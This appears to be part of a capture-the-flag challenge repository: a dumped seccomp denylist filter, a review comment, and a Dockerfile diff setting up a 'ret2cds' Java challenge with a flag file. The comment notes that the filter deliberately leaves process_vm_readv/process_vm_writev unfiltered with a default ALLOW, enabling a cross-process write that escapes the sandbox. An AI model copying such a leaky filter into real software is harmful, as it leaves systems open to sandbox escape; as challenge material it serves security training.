0202: 0x15 0x00 0x01 0x00000069 if (A != setuid) goto 0204
0203: 0x06 0x00 0x00 0x00000000 return KILL
0204: 0x15 0x00 0x01 0x0000006a if (A != setgid) goto 0206
0205: 0x06 0x00 0x00 0x00000000 return KILL
0206: 0x15 0x00 0x01 0x0000006b if (A != geteuid) goto 0208
0207: 0x06 0x00 0x00 0x00000000 return KILL
0208: 0x15 0x00 0x01 0x0000006c if (A != getegid) goto 0210
0209: 0x06 0x00 0x00 0x00000000 return KILL
0210: 0x15 0x00 0x01 0x0000006d if (A != setpgid) goto 0212
0211: 0x06 0x00 0x00 0x00000000 return KILL
0212: 0x15 0x00 0x01 0x0000006e if (A != getppid) goto 0214
0213: 0x06 0x00 0x00 0x00000000 return KILL
0214: 0x15 0x00 0x01 0x0000006f if (A != getpgrp) goto 0216
0215: 0x06 0x00 0x00 0x00000000 return KILL
0216: 0x15 0x00 0x01 0x00000070 if (A != setsid) goto 0218
0217: 0x06 0x00 0x00 0x00000000 return KILL
0218: 0x15 0x00 0x01 0x00000071 if (A != setreuid) goto 0220
0219: 0x06 0x00 0x00 0x00000000 return KILL
0220: 0x15 0x00 0x01 0x00000072 if (A != setregid) goto 0222
0221: 0x06 0x00 0x00 0x00000000 return KILL
0222: 0x15 0x00 0x01 0x00000073 if (A != getgroups) goto 0224
0223: 0x06 0x00 0x00 0x00000000 return KILL
0224: 0x15 0x00 0x01 0x00000074 if (A != setgroups) goto 0226
0225: 0x06 0x00 0x00 0x00000000 return KILL
0226: 0x15 0x00 0x01 0x00000075 if (A != setresuid) goto 0228
0227: 0x06 0x00 0x00 0x00000000 return KILL
0228: 0x15 0x00 0x01 0x00000076 if (A != getresuid) goto 0230
0229: 0x06 0x00 0x00 0x00000000 return KILL
0230: 0x15 0x00 0x01 0x00000077 if (A != setresgid) goto 0232
0231: 0x06 0x00 0x00 0x00000000 return KILL
0232: 0x15 0x00 0x01 0x00000078 if (A != getresgid) goto 0234
0233: 0x06 0x00 0x00 0x00000000 return KILL
0234: 0x15 0x00 0x01 0x00000079 if (A != getpgid) goto 0236
0235: 0x06 0x00 0x00 0x00000000 return KILL
0236: 0x15 0x00 0x01 0x0000007a if (A != setfsuid) goto 0238
0237: 0x06 0x00 0x00 0x00000000 return KILL
0238: 0x15 0x00 0x01 0x0000007b if (A != setfsgid) goto 0240
0239: 0x06 0x00 0x00 0x00000000 return KILL
0240: 0x15 0x00 0x01 0x0000007c if (A != getsid) goto 0242
0241: 0x06 0x00 0x00 0x00000000 return KILL
0242: 0x15 0x00 0x01 0x0000007d if (A != capget) goto 0244
0243: 0x06 0x00 0x00 0x00000000 return KILL
0244: 0x15 0x00 0x01 0x0000007e if (A != capset) goto 0246
0245: 0x06 0x00 0x00 0x00000000 return KILL
0246: 0x15 0x00 0x01 0x0000007f if (A != rt_sigpending) goto 0248
0247: 0x06 0x00 0x00 0x00000000 return KILL
0248: 0x15 0x00 0x01 0x00000080 if (A != rt_sigtimedwait) goto 0250
0249: 0x06 0x00 0x00 0x00000000 return KILL
0250: 0x15 0x00 0x01 0x00000081 if (A != rt_sigqueueinfo) goto 0252
0251: 0x06 0x00 0x00 0x00000000 return KILL
0252: 0x15 0x00 0x01 0x00000082 if (A != rt_sigsuspend) goto 0254
0253: 0x06 0x00 0x00 0x00000000 return KILL
0254: 0x15 0x00 0x01 0x00000083 if (A != sigaltstack) goto 0256
0255: 0x06 0x00 0x00 0x00000000 return KILL
0256: 0x15 0x00 0x01 0x00000084 if (A != utime) goto 0258
0257: 0x06 0x00 0x00 0x00000000 return KILL
0258: 0x15 0x00 0x01 0x00000085 if (A != mknod) goto 0260
0259: 0x06 0x00 0x00 0x00000000 return KILL
0260: 0x15 0x00 0x01 0x00000086 if (A != uselib) goto 0262
0261: 0x06 0x00 0x00 0x00000000 return KILL
0262: 0x15 0x00 0x01 0x00000087 if (A != personality) goto 0264
0263: 0x06 0x00 0x00 0x00000000 return KILL
0264: 0x15 0x00 0x01 0x00000088 if (A != ustat) goto 0266
0265: 0x06 0x00 0x00 0x00000000 return KILL
0266: 0x15 0x00 0x01 0x00000089 if (A != statfs) goto 0268
0267: 0x06 0x00 0x00 0x00000000 return KILL
0268: 0x15 0x00 0x01 0x0000008a if (A != fstatfs) goto 0270
0269: 0x06 0x00 0x00 0x00000000 return KILL
0270: 0x15 0x00 0x01 0x0000008b if (A != sysfs) goto 0272
0271: 0x06 0x00 0x00 0x00000000 return KILL
0272: 0x15 0x00 0x01 0x0000008c if (A != getpriority) goto 0274
0273: 0x06 0x00 0x00 0x00000000 return KILL
0274: 0x15 0x00 0x01 0x0000008d if (A != setpriority) goto 0276
0275: 0x06 0x00 0x00 0x00000000 return KILL
0276: 0x15 0x00 0x01 0x0000008e if (A != sched_setparam) goto 0278
0277: 0x06 0x00 0x00 0x00000000 return KILL
0278: 0x15 0x00 0x01 0x0000008f if (A != sched_getparam) goto 0280
0279: 0x06 0x00 0x00 0x00000000 return KILL
0280: 0x15 0x00 0x01 0x00000090 if (A != sched_setscheduler) goto 0282
0281: 0x06 0x00 0x00 0x00000000 return KILL
0282: 0x15 0x00 0x01 0x00000091 if (A != sched_getscheduler) goto 0284
0283: 0x06 0x00 0x00 0x00000000 return KILL
0284: 0x15 0x00 0x01 0x00000092 if (A != sched_get_priority_max) goto 0286
0285: 0x06 0x00 0x00 0x00000000 return KILL
0286: 0x15 0x00 0x01 0x00000093 if (A != sched_get_priority_min) goto 0288
0287: 0x06 0x00 0x00 0x00000000 return KILL
0288: 0x15 0x00 0x01 0x00000094 if (A != sched_rr_get_interval) goto 0290
0289: 0x06 0x00 0x00 0x00000000 return KILL
0290: 0x15 0x00 0x01 0x00000095 if (A != mlock) goto 0292
0291: 0x06 0x00 0x00 0x00000000 return KILL
0292: 0x15 0x00 0x01 0x00000096 if (A != munlock) goto 0294
0293: 0x06 0x00 0x00 0x00000000 return KILL
0294: 0x15 0x00 0x01 0x00000097 if (A != mlockall) goto 0296
0295: 0x06 0x00 0x00 0x00000000 return KILL
0296: 0x15 0x00 0x01 0x00000098 if (A != munlockall) goto 0298
0297: 0x06 0x00 0x00 0x00000000 return KILL
0298: 0x15 0x00 0x01 0x00000099 if (A != vhangup) goto 0300
0299: 0x06 0x00 0x00 0x00000000 return KILL
0300: 0x15 0x00 0x01 0x0000009a if (A != modify_ldt) goto 0302
0301: 0x06 0x00 0x00 0x00000000 return KILL
0302: 0x15 0x00 0x01 0x0000009b if (A != pivot_root) goto 0304
0303: 0x06 0x00 0x00 0x00000000 return KILL
0304: 0x15 0x00 0x01 0x0000009c if (A != _sysctl) goto 0306
0305: 0x06 0x00 0x00 0x00000000 return KILL
0306: 0x15 0x00 0x01 0x0000009d if (A != prctl) goto 0308
0307: 0x06 0x00 0x00 0x00000000 return KILL
0308: 0x15 0x00 0x01 0x0000009e if (A != arch_prctl) goto 0310
0309: 0x06 0x00 0x00 0x00000000 return KILL
0310: 0x15 0x00 0x01 0x0000009f if (A != adjtimex) goto 0312
0311: 0x06 0x00 0x00 0x00000000 return KILL
0312: 0x15 0x00 0x01 0x000000a0 if (A != setrlimit) goto 0314
0313: 0x06 0x00 0x00 0x00000000 return KILL
0314: 0x15 0x00 0x01 0x000000a1 if (A != chroot) goto 0316
0315: 0x06 0x00 0x00 0x00000000 return KILL
0316: 0x15 0x00 0x01 0x000000a2 if (A != sync) goto 0318
0317: 0x06 0x00 0x00 0x00000000 return KILL
0318: 0x15 0x00 0x01 0x000000a3 if (A != acct) goto 0320
0319: 0x06 0x00 0x00 0x00000000 return KILL
0320: 0x15 0x00 0x01 0x000000a4 if (A != settimeofday) goto 0322
0321: 0x06 0x00 0x00 0x00000000 return KILL
0322: 0x15 0x00 0x01 0x000000a5 if (A != mount) goto 0324
0323: 0x06 0x00 0x00 0x00000000 return KILL
0324: 0x15 0x00 0x01 0x000000a6 if (A != umount2) goto 0326
0325: 0x06 0x00 0x00 0x00000000 return KILL
0326: 0x15 0x00 0x01 0x000000a7 if (A != swapon) goto 0328
0327: 0x06 0x00 0x00 0x00000000 return KILL
0328: 0x15 0x00 0x01 0x000000a8 if (A != swapoff) goto 0330
0329: 0x06 0x00 0x00 0x00000000 return KILL
0330: 0x15 0x00 0x01 0x000000aa if (A != sethostname) goto 0332
0331: 0x06 0x00 0x00 0x00000000 return KILL
0332: 0x15 0x00 0x01 0x000000ab if (A != setdomainname) goto 0334
0333: 0x06 0x00 0x00 0x00000000 return KILL
0334: 0x15 0x00 0x01 0x000000ac if (A != iopl) goto 0336
0335: 0x06 0x00 0x00 0x00000000 return KILL
0336: 0x15 0x00 0x01 0x000000ad if (A != ioperm) goto 0338
0337: 0x06 0x00 0x00 0x00000000 return KILL
0338: 0x15 0x00 0x01 0x000000ae if (A != create_module) goto 0340
0339: 0x06 0x00 0x00 0x00000000 return KILL
0340: 0x15 0x00 0x01 0x000000af if (A != init_module) goto 0342
0341: 0x06 0x00 0x00 0x00000000 return KILL
0342: 0x15 0x00 0x01 0x000000b0 if (A != delete_module) goto 0344
0343: 0x06 0x00 0x00 0x00000000 return KILL
0344: 0x15 0x00 0x01 0x000000b1 if (A != get_kernel_syms) goto 0346
0345: 0x06 0x00 0x00 0x00000000 return KILL
0346: 0x15 0x00 0x01 0x000000b2 if (A != query_module) goto 0348
0347: 0x06 0x00 0x00 0x00000000 return KILL
0348: 0x15 0x00 0x01 0x000000b3 if (A != quotactl) goto 0350
0349: 0x06 0x00 0x00 0x00000000 return KILL
0350: 0x15 0x00 0x01 0x000000b4 if (A != nfsservctl) goto 0352
0351: 0x06 0x00 0x00 0x00000000 return KILL
0352: 0x15 0x00 0x01 0x000000b5 if (A != getpmsg) goto 0354
0353: 0x06 0x00 0x00 0x00000000 return KILL
0354: 0x15 0x00 0x01 0x000000b6 if (A != putpmsg) goto 0356
0355: 0x06 0x00 0x00 0x00000000 return KILL
0356: 0x15 0x00 0x01 0x000000b7 if (A != afs_syscall) goto 0358
0357: 0x06 0x00 0x00 0x00000000 return KILL
0358: 0x15 0x00 0x01 0x000000b8 if (A != tuxcall) goto 0360
0359: 0x06 0x00 0x00 0x00000000 return KILL
0360: 0x15 0x00 0x01 0x000000b9 if (A != security) goto 0362
0361: 0x06 0x00 0x00 0x00000000 return KILL
0362: 0x15 0x00 0x01 0x000000ba if (A != gettid) goto 0364
0363: 0x06 0x00 0x00 0x00000000 return KILL
0364: 0x15 0x00 0x01 0x000000bb if (A != readahead) goto 0366
0365: 0x06 0x00 0x00 0x00000000 return KILL
0366: 0x15 0x00 0x01 0x000000bc if (A != setxattr) goto 0368
0367: 0x06 0x00 0x00 0x00000000 return KILL
0368: 0x15 0x00 0x01 0x000000bd if (A != lsetxattr) goto 0370
0369: 0x06 0x00 0x00 0x00000000 return KILL
0370: 0x15 0x00 0x01 0x000000be if (A != fsetxattr) goto 0372
0371: 0x06 0x00 0x00 0x00000000 return KILL
0372: 0x15 0x00 0x01 0x000000bf if (A != getxattr) goto 0374
0373: 0x06 0x00 0x00 0x00000000 return KILL
0374: 0x15 0x00 0x01 0x000000c0 if (A != lgetxattr) goto 0376
0375: 0x06 0x00 0x00 0x00000000 return KILL
0376: 0x15 0x00 0x01 0x000000c1 if (A != fgetxattr) goto 0378
0377: 0x06 0x00 0x00 0x00000000 return KILL
0378: 0x15 0x00 0x01 0x000000c2 if (A != listxattr) goto 0380
0379: 0x06 0x00 0x00 0x00000000 return KILL
0380: 0x15 0x00 0x01 0x000000c3 if (A != llistxattr) goto 0382
0381: 0x06 0x00 0x00 0x00000000 return KILL
0382: 0x15 0x00 0x01 0x000000c4 if (A != flistxattr) goto 0384
0383: 0x06 0x00 0x00 0x00000000 return KILL
0384: 0x15 0x00 0x01 0x000000c5 if (A != removexattr) goto 0386
0385: 0x06 0x00 0x00 0x00000000 return KILL
0386: 0x15 0x00 0x01 0x000000c6 if (A != lremovexattr) goto 0388
0387: 0x06 0x00 0x00 0x00000000 return KILL
0388: 0x15 0x00 0x01 0x000000c7 if (A != fremovexattr) goto 0390
0389: 0x06 0x00 0x00 0x00000000 return KILL
0390: 0x15 0x00 0x01 0x000000c8 if (A != tkill) goto 0392
0391: 0x06 0x00 0x00 0x00000000 return KILL
0392: 0x15 0x00 0x01 0x000000c9 if (A != time) goto 0394
0393: 0x06 0x00 0x00 0x00000000 return KILL
0394: 0x15 0x00 0x01 0x000000ca if (A != futex) goto 0396
0395: 0x06 0x00 0x00 0x00000000 return KILL
0396: 0x15 0x00 0x01 0x000000cb if (A != sched_setaffinity) goto 0398
0397: 0x06 0x00 0x00 0x00000000 return KILL
0398: 0x15 0x00 0x01 0x000000cc if (A != sched_getaffinity) goto 0400
0399: 0x06 0x00 0x00 0x00000000 return KILL
0400: 0x15 0x00 0x01 0x000000cd if (A != set_thread_area) goto 0402
0401: 0x06 0x00 0x00 0x00000000 return KILL
0402: 0x15 0x00 0x01 0x000000ce if (A != io_setup) goto 0404
0403: 0x06 0x00 0x00 0x00000000 return KILL
0404: 0x15 0x00 0x01 0x000000cf if (A != io_destroy) goto 0406
0405: 0x06 0x00 0x00 0x00000000 return KILL
0406: 0x15 0x00 0x01 0x000000d0 if (A != io_getevents) goto 0408
0407: 0x06 0x00 0x00 0x00000000 return KILL
0408: 0x15 0x00 0x01 0x000000d1 if (A != io_submit) goto 0410
0409: 0x06 0x00 0x00 0x00000000 return KILL
0410: 0x15 0x00 0x01 0x000000d2 if (A != io_cancel) goto 0412
0411: 0x06 0x00 0x00 0x00000000 return KILL
0412: 0x15 0x00 0x01 0x000000d3 if (A != get_thread_area) goto 0414
0413: 0x06 0x00 0x00 0x00000000 return KILL
0414: 0x15 0x00 0x01 0x000000d4 if (A != lookup_dcookie) goto 0416
0415: 0x06 0x00 0x00 0x00000000 return KILL
0416: 0x15 0x00 0x01 0x000000d5 if (A != epoll_create) goto 0418
0417: 0x06 0x00 0x00 0x00000000 return KILL
0418: 0x15 0x00 0x01 0x000000d6 if (A != epoll_ctl_old) goto 0420
0419: 0x06 0x00 0x00 0x00000000 return KILL
0420: 0x15 0x00 0x01 0x000000d7 if (A != epoll_wait_old) goto 0422
0421: 0x06 0x00 0x00 0x00000000 return KILL
0422: 0x15 0x00 0x01 0x000000d8 if (A != remap_file_pages) goto 0424
0423: 0x06 0x00 0x00 0x00000000 return KILL
0424: 0x15 0x00 0x01 0x000000d9 if (A != getdents64) goto 0426
0425: 0x06 0x00 0x00 0x00000000 return KILL
0426: 0x15 0x00 0x01 0x000000da if (A != set_tid_address) goto 0428
0427: 0x06 0x00 0x00 0x00000000 return KILL
0428: 0x15 0x00 0x01 0x000000db if (A != restart_syscall) goto 0430
0429: 0x06 0x00 0x00 0x00000000 return KILL
0430: 0x15 0x00 0x01 0x000000dc if (A != semtimedop) goto 0432
0431: 0x06 0x00 0x00 0x00000000 return KILL
0432: 0x15 0x00 0x01 0x000000dd if (A != fadvise64) goto 0434
0433: 0x06 0x00 0x00 0x00000000 return KILL
0434: 0x15 0x00 0x01 0x000000de if (A != timer_create) goto 0436
0435: 0x06 0x00 0x00 0x00000000 return KILL
0436: 0x15 0x00 0x01 0x000000df if (A != timer_settime) goto 0438
0437: 0x06 0x00 0x00 0x00000000 return KILL
0438: 0x15 0x00 0x01 0x000000e0 if (A != timer_gettime) goto 0440
0439: 0x06 0x00 0x00 0x00000000 return KILL
0440: 0x15 0x00 0x01 0x000000e1 if (A != timer_getoverrun) goto 0442
0441: 0x06 0x00 0x00 0x00000000 return KILL
0442: 0x15 0x00 0x01 0x000000e2 if (A != timer_delete) goto 0444
0443: 0x06 0x00 0x00 0x00000000 return KILL
0444: 0x15 0x00 0x01 0x000000e3 if (A != clock_settime) goto 0446
0445: 0x06 0x00 0x00 0x00000000 return KILL
0446: 0x15 0x00 0x01 0x000000e4 if (A != clock_gettime) goto 0448
0447: 0x06 0x00 0x00 0x00000000 return KILL
0448: 0x15 0x00 0x01 0x000000e5 if (A != clock_getres) goto 0450
0449: 0x06 0x00 0x00 0x00000000 return KILL
0450: 0x15 0x00 0x01 0x000000e6 if (A != clock_nanosleep) goto 0452
0451: 0x06 0x00 0x00 0x00000000 return KILL
0452: 0x15 0x00 0x01 0x000000e8 if (A != epoll_wait) goto 0454
0453: 0x06 0x00 0x00 0x00000000 return KILL
0454: 0x15 0x00 0x01 0x000000e9 if (A != epoll_ctl) goto 0456
0455: 0x06 0x00 0x00 0x00000000 return KILL
0456: 0x15 0x00 0x01 0x000000ea if (A != tgkill) goto 0458
0457: 0x06 0x00 0x00 0x00000000 return KILL
0458: 0x15 0x00 0x01 0x000000eb if (A != utimes) goto 0460
0459: 0x06 0x00 0x00 0x00000000 return KILL
0460: 0x15 0x00 0x01 0x000000ec if (A != vserver) goto 0462
0461: 0x06 0x00 0x00 0x00000000 return KILL
0462: 0x15 0x00 0x01 0x000000ed if (A != mbind) goto 0464
0463: 0x06 0x00 0x00 0x00000000 return KILL
0464: 0x15 0x00 0x01 0x000000ee if (A != set_mempolicy) goto 0466
0465: 0x06 0x00 0x00 0x00000000 return KILL
0466: 0x15 0x00 0x01 0x000000ef if (A != get_mempolicy) goto 0468
0467: 0x06 0x00 0x00 0x00000000 return KILL
0468: 0x15 0x00 0x01 0x000000f0 if (A != mq_open) goto 0470
0469: 0x06 0x00 0x00 0x00000000 return KILL
0470: 0x15 0x00 0x01 0x000000f1 if (A != mq_unlink) goto 0472
0471: 0x06 0x00 0x00 0x00000000 return KILL
0472: 0x15 0x00 0x01 0x000000f2 if (A != mq_timedsend) goto 0474
0473: 0x06 0x00 0x00 0x00000000 return KILL
0474: 0x15 0x00 0x01 0x000000f3 if (A != mq_timedreceive) goto 0476
0475: 0x06 0x00 0x00 0x00000000 return KILL
0476: 0x15 0x00 0x01 0x000000f4 if (A != mq_notify) goto 0478
0477: 0x06 0x00 0x00 0x00000000 return KILL
0478: 0x15 0x00 0x01 0x000000f5 if (A != mq_getsetattr) goto 0480
0479: 0x06 0x00 0x00 0x00000000 return KILL
0480: 0x15 0x00 0x01 0x000000f6 if (A != kexec_load) goto 0482
0481: 0x06 0x00 0x00 0x00000000 return KILL
0482: 0x15 0x00 0x01 0x000000f7 if (A != waitid) goto 0484
0483: 0x06 0x00 0x00 0x00000000 return KILL
0484: 0x15 0x00 0x01 0x000000f8 if (A != add_key) goto 0486
0485: 0x06 0x00 0x00 0x00000000 return KILL
0486: 0x15 0x00 0x01 0x000000f9 if (A != request_key) goto 0488
0487: 0x06 0x00 0x00 0x00000000 return KILL
0488: 0x15 0x00 0x01 0x000000fa if (A != keyctl) goto 0490
0489: 0x06 0x00 0x00 0x00000000 return KILL
0490: 0x15 0x00 0x01 0x000000fb if (A != ioprio_set) goto 0492
0491: 0x06 0x00 0x00 0x00000000 return KILL
0492: 0x15 0x00 0x01 0x000000fc if (A != ioprio_get) goto 0494
0493: 0x06 0x00 0x00 0x00000000 return KILL
0494: 0x15 0x00 0x01 0x000000fd if (A != inotify_init) goto 0496
0495: 0x06 0x00 0x00 0x00000000 return KILL
0496: 0x15 0x00 0x01 0x000000fe if (A != inotify_add_watch) goto 0498
0497: 0x06 0x00 0x00 0x00000000 return KILL
0498: 0x15 0x00 0x01 0x000000ff if (A != inotify_rm_watch) goto 0500
0499: 0x06 0x00 0x00 0x00000000 return KILL
0500: 0x15 0x00 0x01 0x00000100 if (A != migrate_pages) goto 0502
0501: 0x06 0x00 0x00 0x00000000 return KILL
0502: 0x15 0x00 0x01 0x00000101 if (A != openat) goto 0504
0503: 0x06 0x00 0x00 0x00000000 return KILL
0504: 0x15 0x00 0x01 0x00000102 if (A != mkdirat) goto 0506
0505: 0x06 0x00 0x00 0x00000000 return KILL
0506: 0x15 0x00 0x01 0x00000103 if (A != mknodat) goto 0508
0507: 0x06 0x00 0x00 0x00000000 return KILL
0508: 0x15 0x00 0x01 0x00000104 if (A != fchownat) goto 0510
0509: 0x06 0x00 0x00 0x00000000 return KILL
0510: 0x15 0x00 0x01 0x00000105 if (A != futimesat) goto 0512
0511: 0x06 0x00 0x00 0x00000000 return KILL
0512: 0x15 0x00 0x01 0x00000106 if (A != newfstatat) goto 0514
0513: 0x06 0x00 0x00 0x00000000 return KILL
0514: 0x15 0x00 0x01 0x00000107 if (A != unlinkat) goto 0516
0515: 0x06 0x00 0x00 0x00000000 return KILL
0516: 0x15 0x00 0x01 0x00000108 if (A != renameat) goto 0518
0517: 0x06 0x00 0x00 0x00000000 return KILL
0518: 0x15 0x00 0x01 0x00000109 if (A != linkat) goto 0520
0519: 0x06 0x00 0x00 0x00000000 return KILL
0520: 0x15 0x00 0x01 0x0000010a if (A != symlinkat) goto 0522
0521: 0x06 0x00 0x00 0x00000000 return KILL
0522: 0x15 0x00 0x01 0x0000010b if (A != readlinkat) goto 0524
0523: 0x06 0x00 0x00 0x00000000 return KILL
0524: 0x15 0x00 0x01 0x0000010c if (A != fchmodat) goto 0526
0525: 0x06 0x00 0x00 0x00000000 return KILL
0526: 0x15 0x00 0x01 0x0000010d if (A != faccessat) goto 0528
0527: 0x06 0x00 0x00 0x00000000 return KILL
0528: 0x15 0x00 0x01 0x0000010e if (A != pselect6) goto 0530
0529: 0x06 0x00 0x00 0x00000000 return KILL
0530: 0x15 0x00 0x01 0x0000010f if (A != ppoll) goto 0532
0531: 0x06 0x00 0x00 0x00000000 return KILL
0532: 0x15 0x00 0x01 0x00000110 if (A != unshare) goto 0534
0533: 0x06 0x00 0x00 0x00000000 return KILL
0534: 0x15 0x00 0x01 0x00000111 if (A != set_robust_list) goto 0536
0535: 0x06 0x00 0x00 0x00000000 return KILL
0536: 0x15 0x00 0x01 0x00000112 if (A != get_robust_list) goto 0538
0537: 0x06 0x00 0x00 0x00000000 return KILL
0538: 0x15 0x00 0x01 0x00000113 if (A != splice) goto 0540
0539: 0x06 0x00 0x00 0x00000000 return KILL
0540: 0x15 0x00 0x01 0x00000114 if (A != tee) goto 0542
0541: 0x06 0x00 0x00 0x00000000 return KILL
0542: 0x15 0x00 0x01 0x00000115 if (A != sync_file_range) goto 0544
0543: 0x06 0x00 0x00 0x00000000 return KILL
0544: 0x15 0x00 0x01 0x00000116 if (A != vmsplice) goto 0546
0545: 0x06 0x00 0x00 0x00000000 return KILL
0546: 0x15 0x00 0x01 0x00000117 if (A != move_pages) goto 0548
0547: 0x06 0x00 0x00 0x00000000 return KILL
0548: 0x15 0x00 0x01 0x00000118 if (A != utimensat) goto 0550
0549: 0x06 0x00 0x00 0x00000000 return KILL
0550: 0x15 0x00 0x01 0x00000119 if (A != epoll_pwait) goto 0552
0551: 0x06 0x00 0x00 0x00000000 return KILL
0552: 0x15 0x00 0x01 0x0000011a if (A != signalfd) goto 0554
0553: 0x06 0x00 0x00 0x00000000 return KILL
0554: 0x15 0x00 0x01 0x0000011b if (A != timerfd) goto 0556
0555: 0x06 0x00 0x00 0x00000000 return KILL
0556: 0x15 0x00 0x01 0x0000011c if (A != eventfd) goto 0558
0557: 0x06 0x00 0x00 0x00000000 return KILL
0558: 0x15 0x00 0x01 0x0000011d if (A != fallocate) goto 0560
0559: 0x06 0x00 0x00 0x00000000 return KILL
0560: 0x15 0x00 0x01 0x0000011e if (A != timerfd_settime) goto 0562
0561: 0x06 0x00 0x00 0x00000000 return KILL
0562: 0x15 0x00 0x01 0x0000011f if (A != timerfd_gettime) goto 0564
0563: 0x06 0x00 0x00 0x00000000 return KILL
0564: 0x15 0x00 0x01 0x00000120 if (A != accept4) goto 0566
0565: 0x06 0x00 0x00 0x00000000 return KILL
0566: 0x15 0x00 0x01 0x00000121 if (A != signalfd4) goto 0568
0567: 0x06 0x00 0x00 0x00000000 return KILL
0568: 0x15 0x00 0x01 0x00000122 if (A != eventfd2) goto 0570
0569: 0x06 0x00 0x00 0x00000000 return KILL
0570: 0x15 0x00 0x01 0x00000123 if (A != epoll_create1) goto 0572
0571: 0x06 0x00 0x00 0x00000000 return KILL
0572: 0x15 0x00 0x01 0x00000124 if (A != dup3) goto 0574
0573: 0x06 0x00 0x00 0x00000000 return KILL
0574: 0x15 0x00 0x01 0x00000125 if (A != pipe2) goto 0576
0575: 0x06 0x00 0x00 0x00000000 return KILL
0576: 0x15 0x00 0x01 0x00000126 if (A != inotify_init1) goto 0578
0577: 0x06 0x00 0x00 0x00000000 return KILL
0578: 0x15 0x00 0x01 0x00000127 if (A != preadv) goto 0580
0579: 0x06 0x00 0x00 0x00000000 return KILL
0580: 0x15 0x00 0x01 0x00000128 if (A != pwritev) goto 0582
0581: 0x06 0x00 0x00 0x00000000 return KILL
0582: 0x15 0x00 0x01 0x00000129 if (A != rt_tgsigqueueinfo) goto 0584
0583: 0x06 0x00 0x00 0x00000000 return KILL
0584: 0x15 0x00 0x01 0x0000012a if (A != perf_event_open) goto 0586
0585: 0x06 0x00 0x00 0x00000000 return KILL
0586: 0x15 0x00 0x01 0x0000012b if (A != recvmmsg) goto 0588
0587: 0x06 0x00 0x00 0x00000000 return KILL
0588: 0x15 0x00 0x01 0x0000012c if (A != fanotify_init) goto 0590
0589: 0x06 0x00 0x00 0x00000000 return KILL
0590: 0x15 0x00 0x01 0x0000012d if (A != fanotify_mark) goto 0592
0591: 0x06 0x00 0x00 0x00000000 return KILL
0592: 0x15 0x00 0x01 0x0000012e if (A != prlimit64) goto 0594
0593: 0x06 0x00 0x00 0x00000000 return KILL
0594: 0x15 0x00 0x01 0x0000012f if (A != name_to_handle_at) goto 0596
0595: 0x06 0x00 0x00 0x00000000 return KILL
0596: 0x15 0x00 0x01 0x00000130 if (A != open_by_handle_at) goto 0598
0597: 0x06 0x00 0x00 0x00000000 return KILL
0598: 0x15 0x00 0x01 0x00000131 if (A != clock_adjtime) goto 0600
0599: 0x06 0x00 0x00 0x00000000 return KILL
0600: 0x15 0x00 0x01 0x00000132 if (A != syncfs) goto 0602
0601: 0x06 0x00 0x00 0x00000000 return KILL
0602: 0x15 0x00 0x01 0x00000133 if (A != sendmmsg) goto 0604
0603: 0x06 0x00 0x00 0x00000000 return KILL
0604: 0x15 0x00 0x01 0x00000134 if (A != setns) goto 0606
0605: 0x06 0x00 0x00 0x00000000 return KILL
0606: 0x15 0x00 0x01 0x00000135 if (A != getcpu) goto 0608
0607: 0x06 0x00 0x00 0x00000000 return KILL
0608: 0x15 0x00 0x01 0x00000138 if (A != kcmp) goto 0610
0609: 0x06 0x00 0x00 0x00000000 return KILL
0610: 0x15 0x00 0x01 0x00000139 if (A != finit_module) goto 0612
0611: 0x06 0x00 0x00 0x00000000 return KILL
0612: 0x15 0x00 0x01 0x0000013a if (A != sched_setattr) goto 0614
0613: 0x06 0x00 0x00 0x00000000 return KILL
0614: 0x15 0x00 0x01 0x0000013b if (A != sched_getattr) goto 0616
0615: 0x06 0x00 0x00 0x00000000 return KILL
0616: 0x15 0x00 0x01 0x0000013c if (A != renameat2) goto 0618
0617: 0x06 0x00 0x00 0x00000000 return KILL
0618: 0x15 0x00 0x01 0x0000013d if (A != seccomp) goto 0620
0619: 0x06 0x00 0x00 0x00000000 return KILL
0620: 0x15 0x00 0x01 0x0000013e if (A != getrandom) goto 0622
0621: 0x06 0x00 0x00 0x00000000 return KILL
0622: 0x15 0x00 0x01 0x0000013f if (A != memfd_create) goto 0624
0623: 0x06 0x00 0x00 0x00000000 return KILL
0624: 0x15 0x00 0x01 0x00000140 if (A != kexec_file_load) goto 0626
0625: 0x06 0x00 0x00 0x00000000 return KILL
0626: 0x15 0x00 0x01 0x00000141 if (A != bpf) goto 0628
0627: 0x06 0x00 0x00 0x00000000 return KILL
0628: 0x15 0x00 0x01 0x00000143 if (A != userfaultfd) goto 0630
0629: 0x06 0x00 0x00 0x00000000 return KILL
0630: 0x15 0x00 0x01 0x00000144 if (A != membarrier) goto 0632
0631: 0x06 0x00 0x00 0x00000000 return KILL
0632: 0x15 0x00 0x01 0x00000145 if (A != mlock2) goto 0634
0633: 0x06 0x00 0x00 0x00000000 return KILL
0634: 0x15 0x00 0x01 0x00000146 if (A != copy_file_range) goto 0636
0635: 0x06 0x00 0x00 0x00000000 return KILL
0636: 0x15 0x00 0x01 0x00000147 if (A != preadv2) goto 0638
0637: 0x06 0x00 0x00 0x00000000 return KILL
0638: 0x15 0x00 0x01 0x00000148 if (A != pwritev2) goto 0640
0639: 0x06 0x00 0x00 0x00000000 return KILL
0640: 0x15 0x00 0x01 0x00000149 if (A != pkey_mprotect) goto 0642
0641: 0x06 0x00 0x00 0x00000000 return KILL
0642: 0x15 0x00 0x01 0x0000014a if (A != pkey_alloc) goto 0644
0643: 0x06 0x00 0x00 0x00000000 return KILL
0644: 0x15 0x00 0x01 0x0000014b if (A != pkey_free) goto 0646
0645: 0x06 0x00 0x00 0x00000000 return KILL
0646: 0x15 0x00 0x01 0x0000014c if (A != statx) goto 0648
0647: 0x06 0x00 0x00 0x00000000 return KILL
0648: 0x06 0x00 0x00 0x7fff0000 return ALLOW
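
Review bot: the filter is a denylist that ends in `0648: ... return ALLOW`, so any syscall number not enumerated in the chain is permitted by default. The chain jumps from `getcpu` (0x135) at 0606 straight to `kcmp` (0x138) at 0608, leaving 0x136 and 0x137 (process_vm_readv / process_vm_writev, the numbers stage2.c defines as 310 and 311) unfiltered, which is exactly what the cross-process write later in this commit relies on. For a sandbox that is meant to hold, the robust shape is an allowlist of the few calls the program needs with a default KILL; a denylist is also silently widened by every syscall a newer kernel adds.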


@ -0,0 +1,24 @@
FROM ubuntu:20.04
ENV DEBIAN_FRONTEND noninteractive
RUN apt-get update
RUN apt-get install -y openjdk-11-jdk
RUN useradd -m ret2cds
COPY ./chall /home/ret2cds
RUN mkdir /opt/nc-java
COPY ./server /opt/nc-java
RUN chmod 755 /home/ret2cds/*
RUN chmod 754 /home/ret2cds/flag.txt
RUN chmod 755 /opt/nc-java/*
